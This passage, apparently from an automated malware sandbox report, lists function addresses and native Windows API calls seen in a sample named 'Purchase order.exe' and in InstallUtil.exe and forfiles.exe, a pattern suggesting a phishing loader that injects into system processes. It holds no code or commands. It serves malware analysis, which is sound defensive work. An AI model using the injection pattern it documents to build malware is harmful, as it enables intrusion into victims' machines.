Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_04602BE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04602BF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_04602BA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046035C0 NtCreateMutant,LdrInitializeThunk, 5_2_046035C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046039B0 NtGetContextThread,LdrInitializeThunk, 5_2_046039B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602C00 NtQueryInformationProcess, 5_2_04602C00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602CF0 NtOpenProcess, 5_2_04602CF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602CC0 NtQueryVirtualMemory, 5_2_04602CC0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602D00 NtSetInformationFile, 5_2_04602D00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602DB0 NtEnumerateKey, 5_2_04602DB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602E30 NtWriteVirtualMemory, 5_2_04602E30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602EA0 NtAdjustPrivilegesToken, 5_2_04602EA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602F60 NtCreateProcessEx, 5_2_04602F60
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602FA0 NtQuerySection, 5_2_04602FA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602F90 NtProtectVirtualMemory, 5_2_04602F90
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602AB0 NtWaitForSingleObject, 5_2_04602AB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602B80 NtQueryInformationFile, 5_2_04602B80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04603010 NtOpenDirectoryObject, 5_2_04603010
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04603090 NtSetValueKey, 5_2_04603090
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04603D70 NtOpenThread, 5_2_04603D70
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04603D10 NtOpenProcessToken, 5_2_04603D10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_00628FA0 NtCreateFile, 5_2_00628FA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_00629110 NtReadFile, 5_2_00629110
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_00629200 NtDeleteFile, 5_2_00629200
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_006292A0 NtClose, 5_2_006292A0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_00629400 NtAllocateVirtualMemory, 5_2_00629400
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06363C98 0_2_06363C98
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063601C8 0_2_063601C8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_01AC1C7F 0_2_01AC1C7F
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_01AC16EA 0_2_01AC16EA
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_01AC16F8 0_2_01AC16F8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06382C40 0_2_06382C40
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E4EA0 0_2_063E4EA0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E8292 0_2_063E8292
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063EAAE6 0_2_063EAAE6
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063EF300 0_2_063EF300
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E4E90 0_2_063E4E90
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E1F48 0_2_063E1F48
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E9423 0_2_063E9423
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E9458 0_2_063E9458
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063EF521 0_2_063EF521
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063EF2F1 0_2_063EF2F1
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E39D5 0_2_063E39D5
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06413013 0_2_06413013
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06416FE0 0_2_06416FE0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0641AA08 0_2_0641AA08
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06410920 0_2_06410920
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_064185E8 0_2_064185E8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06417307 0_2_06417307
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06413C81 0_2_06413C81
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06413C90 0_2_06413C90
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06410916 0_2_06410916
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642DC08 0_2_0642DC08
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642AB98 0_2_0642AB98
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642A5B0 0_2_0642A5B0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642CB68 0_2_0642CB68
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642CB78 0_2_0642CB78
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0642DBF8 0_2_0642DBF8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0645E3D0 0_2_0645E3D0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_064563F8 0_2_064563F8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0645D610 0_2_0645D610
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06456AAF 0_2_06456AAF
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_064563E8 0_2_064563E8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06450040 0_2_06450040
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06450006 0_2_06450006
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0645F9D8 0_2_0645F9D8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06607558 0_2_06607558
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0685FB20 0_2_0685FB20
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0685E678 0_2_0685E678
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06840007 0_2_06840007
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06840040 0_2_06840040
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0685E158 0_2_0685E158
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0622805E 0_2_0622805E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004184E3 2_2_004184E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040E048 2_2_0040E048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040E053 2_2_0040E053
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040E09C 2_2_0040E09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004030B0 2_2_004030B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004011A0 2_2_004011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0042EBE3 2_2_0042EBE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004023FF 2_2_004023FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00402400 2_2_00402400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040FD03 2_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004166DE 2_2_004166DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004166E3 2_2_004166E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00402700 2_2_00402700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040DF03 2_2_0040DF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040FF23 2_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018541A2 2_2_018541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018601AA 2_2_018601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018581CC 2_2_018581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01790100 2_2_01790100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183A118 2_2_0183A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01828158 2_2_01828158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01832000 2_2_01832000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018603E6 2_2_018603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AE3F0 2_2_017AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185A352 2_2_0185A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018202C0 2_2_018202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01840274 2_2_01840274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01860591 2_2_01860591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A0535 2_2_017A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184E4F6 2_2_0184E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01844420 2_2_01844420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01852446 2_2_01852446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A0770 2_2_017A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C4750 2_2_017C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179C7C0 2_2_0179C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BC6E0 2_2_017BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017B6962 2_2_017B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0186A9A6 2_2_0186A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AA840 2_2_017AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017CE8F0 2_2_017CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017868B8 2_2_017868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01856BD7 2_2_01856BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185AB40 2_2_0185AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AAD00 2_2_017AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179ADE0 2_2_0179ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183CD1F 2_2_0183CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017B8DBF 2_2_017B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01840CB5 2_2_01840CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A0C00 2_2_017A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01790CF2 2_2_01790CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0181EFA0 2_2_0181EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C0F30 2_2_017C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017E2F28 2_2_017E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017ACFE0 2_2_017ACFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01792FC8 2_2_01792FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01842F30 2_2_01842F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01814F40 2_2_01814F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185CE93 2_2_0185CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A0E59 2_2_017A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185EEDB 2_2_0185EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185EE26 2_2_0185EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017B2E90 2_2_017B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178F172 2_2_0178F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D516C 2_2_017D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017AB1B0 2_2_017AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0186B16B 2_2_0186B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184F0CC 2_2_0184F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185F0E0 2_2_0185F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018570E9 2_2_018570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0178D34C 2_2_0178D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185132D 2_2_0185132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017E739A 2_2_017E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018412ED 2_2_018412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BB2C0 2_2_017BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A52A0 2_2_017A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183D5B0 2_2_0183D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018695C3 2_2_018695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01857571 2_2_01857571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01791460 2_2_01791460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185F43F 2_2_0185F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185F7B0 2_2_0185F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_018516CC 2_2_018516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017E5630 2_2_017E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A9950 2_2_017A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BB950 2_2_017BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01835910 2_2_01835910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180D800 2_2_0180D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A38E0 2_2_017A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01815BF0 2_2_01815BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017DDBF9 2_2_017DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185FB76 2_2_0185FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BFB80 2_2_017BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01841AA3 2_2_01841AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0184DAC6 2_2_0184DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01857A46 2_2_01857A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185FA49 2_2_0185FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017E5AA0 2_2_017E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01813A6C 2_2_01813A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A3D40 2_2_017A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017BFDC0 2_2_017BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01851D5A 2_2_01851D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01857D73 2_2_01857D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185FCF2 2_2_0185FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01819C32 2_2_01819C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185FFB1 2_2_0185FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0185FF09 2_2_0185FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A1F92 2_2_017A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017A9EB0 2_2_017A9EB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04682446 5_2_04682446
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04674420 5_2_04674420
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0467E4F6 5_2_0467E4F6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D0535 5_2_045D0535
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04690591 5_2_04690591
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045EC6E0 5_2_045EC6E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045F4750 5_2_045F4750
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D0770 5_2_045D0770
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045CC7C0 5_2_045CC7C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04662000 5_2_04662000
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04658158 5_2_04658158
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045C0100 5_2_045C0100
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0466A118 5_2_0466A118
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046881CC 5_2_046881CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046901AA 5_2_046901AA
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046841A2 5_2_046841A2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04670274 5_2_04670274
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046502C0 5_2_046502C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468A352 5_2_0468A352
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046903E6 5_2_046903E6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045DE3F0 5_2_045DE3F0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D0C00 5_2_045D0C00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045C0CF2 5_2_045C0CF2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04670CB5 5_2_04670CB5
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045DAD00 5_2_045DAD00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0466CD1F 5_2_0466CD1F
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045CADE0 5_2_045CADE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045E8DBF 5_2_045E8DBF
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D0E59 5_2_045D0E59
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468EE26 5_2_0468EE26
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468EEDB 5_2_0468EEDB
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045E2E90 5_2_045E2E90
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468CE93 5_2_0468CE93
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04644F40 5_2_04644F40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04612F28 5_2_04612F28
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04672F30 5_2_04672F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045F0F30 5_2_045F0F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045C2FC8 5_2_045C2FC8
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045DCFE0 5_2_045DCFE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0464EFA0 5_2_0464EFA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045DA840 5_2_045DA840
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045FE8F0 5_2_045FE8F0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045B68B8 5_2_045B68B8
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045E6962 5_2_045E6962
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0469A9A6 5_2_0469A9A6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045CEA80 5_2_045CEA80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468AB40 5_2_0468AB40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04686BD7 5_2_04686BD7
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045C1460 5_2_045C1460
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468F43F 5_2_0468F43F
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04687571 5_2_04687571
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046995C3 5_2_046995C3
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0466D5B0 5_2_0466D5B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04615630 5_2_04615630
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046816CC 5_2_046816CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468F7B0 5_2_0468F7B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046870E9 5_2_046870E9
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468F0E0 5_2_0468F0E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0467F0CC 5_2_0467F0CC
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0469B16B 5_2_0469B16B
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0460516C 5_2_0460516C
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045BF172 5_2_045BF172
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045DB1B0 5_2_045DB1B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_046712ED 5_2_046712ED
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045EB2C0 5_2_045EB2C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D52A0 5_2_045D52A0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045BD34C 5_2_045BD34C
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468132D 5_2_0468132D
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0461739A 5_2_0461739A
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04649C32 5_2_04649C32
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468FCF2 5_2_0468FCF2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04687D73 5_2_04687D73
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D3D40 5_2_045D3D40
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04681D5A 5_2_04681D5A
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045EFDC0 5_2_045EFDC0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D9EB0 5_2_045D9EB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468FF09 5_2_0468FF09
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D1F92 5_2_045D1F92
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468FFB1 5_2_0468FFB1
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0463D800 5_2_0463D800
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D38E0 5_2_045D38E0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045D9950 5_2_045D9950
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045EB950 5_2_045EB950
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04665910 5_2_04665910
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04643A6C 5_2_04643A6C
